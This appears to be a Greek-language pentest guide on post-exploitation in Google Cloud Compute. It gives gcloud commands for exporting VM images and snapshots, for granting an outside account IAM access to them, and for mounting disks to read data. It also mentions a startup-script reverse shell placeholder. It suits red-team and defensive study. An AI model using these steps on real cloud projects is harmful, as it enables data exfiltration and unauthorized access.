GCP - Compute Post Exploitation

Compute

Για περισσότερες πληροφορίες σχετικά με το Compute και το VPC (Δικτύωση) ελέγξτε:

Εξαγωγή & Επιθεώρηση Εικόνων τοπικά

Αυτό θα επέτρεπε σε έναν επιτιθέμενο να έχει πρόσβαση στα δεδομένα που περιέχονται μέσα σε ήδη υπάρχουσες εικόνες ή να δημιουργήσει νέες εικόνες τρεχουσών VM και να έχει πρόσβαση στα δεδομένα τους χωρίς να έχει πρόσβαση στην τρέχουσα VM.

Είναι δυνατή η εξαγωγή μιας εικόνας VM σε ένα bucket και στη συνέχεια η λήψη της και η τοπική τοποθέτησή της με την εντολή:

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

Για να εκτελέσει αυτή την ενέργεια, ο επιτιθέμενος μπορεί να χρειαστεί δικαιώματα πάνω στον αποθηκευτικό κάδο και σίγουρα δικαιώματα πάνω στο cloudbuild, καθώς είναι η υπηρεσία που θα ζητηθεί να εκτελέσει την εξαγωγή. Επιπλέον, για να λειτουργήσει αυτό, ο SA του codebuild και ο SA του compute χρειάζονται προνομιακά δικαιώματα. Ο SA του cloudbuild <project-id>@cloudbuild.gserviceaccount.com χρειάζεται:

• roles/iam.serviceAccountTokenCreator

• roles/compute.admin

• roles/iam.serviceAccountUser

Και ο SA <project-id>-compute@developer.gserviceaccount.com χρειάζεται:

• roles/compute.storageAdmin

• roles/storage.objectAdmin

Εξαγωγή & Επιθεώρηση Στιγμιότυπων & Δίσκων τοπικά

Δεν είναι δυνατόν να εξάγουμε άμεσα στιγμιότυπα και δίσκους, αλλά είναι δυνατόν να μετατρέψουμε ένα στιγμιότυπο σε δίσκο, έναν δίσκο σε εικόνα και ακολουθώντας την προηγούμενη ενότητα, να εξάγουμε αυτή την εικόνα για να την επιθεωρήσουμε τοπικά.

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Επιθεώρηση μιας Εικόνας δημιουργώντας μια VM

Με στόχο την πρόσβαση στα δεδομένα που είναι αποθηκευμένα σε μια εικόνα ή μέσα σε μια τρέχουσα VM από όπου ένας επιτιθέμενος έχει δημιουργήσει μια εικόνα, είναι δυνατόν να παραχωρηθεί πρόσβαση σε έναν εξωτερικό λογαριασμό πάνω στην εικόνα:

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

και στη συνέχεια δημιουργήστε μια νέα VM από αυτό:

gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

Αν δεν μπορούσατε να δώσετε πρόσβαση στον εξωτερικό σας λογαριασμό μέσω της εικόνας, θα μπορούσατε να εκκινήσετε μια VM χρησιμοποιώντας αυτή την εικόνα στο έργο του θύματος και να κάνετε τα μεταδεδομένα να εκτελούν ένα reverse shell για να αποκτήσετε πρόσβαση στην εικόνα προσθέτοντας την παράμετρο:

--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'

Inspect a Snapshot/Disk attaching it to a VM

Με στόχο την πρόσβαση στα δεδομένα που είναι αποθηκευμένα σε έναν δίσκο ή σε ένα στιγμιότυπο, θα μπορούσατε να μετατρέψετε το στιγμιότυπο σε δίσκο, έναν δίσκο σε εικόνα και να ακολουθήσετε τα προηγούμενα βήματα.

Ή θα μπορούσατε να παρέχετε πρόσβαση σε έναν εξωτερικό λογαριασμό πάνω στον δίσκο (αν το αρχικό σημείο είναι ένα στιγμιότυπο, δώστε πρόσβαση στο στιγμιότυπο ή δημιουργήστε έναν δίσκο από αυτό):

gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'

Συνδέστε τον δίσκο σε μια παρουσίαση:

gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]

Mount the disk inside the VM:

1. SSH into the VM:

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]

1. Εντοπίστε τον Δίσκο: Μόλις μπείτε στο VM, εντοπίστε τον νέο δίσκο καταγράφοντας τις συσκευές δίσκου. Συνήθως, μπορείτε να τον βρείτε ως /dev/sdb, /dev/sdc, κ.λπ.

2. Μορφοποιήστε και Συνδέστε τον Δίσκο (αν είναι νέος ή ακατέργαστος δίσκος):

• Δημιουργήστε ένα σημείο σύνδεσης:

sudo mkdir -p /mnt/disks/[MOUNT_DIR]

• Συνδέστε τον δίσκο:

sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]

Αν δεν μπορείτε να δώσετε πρόσβαση σε ένα εξωτερικό έργο στο στιγμιότυπο ή τον δίσκο, ίσως χρειαστεί να εκτελέσετε αυτές τις ενέργειες μέσα σε μια παρουσία στο ίδιο έργο με το στιγμιότυπο/δίσκο.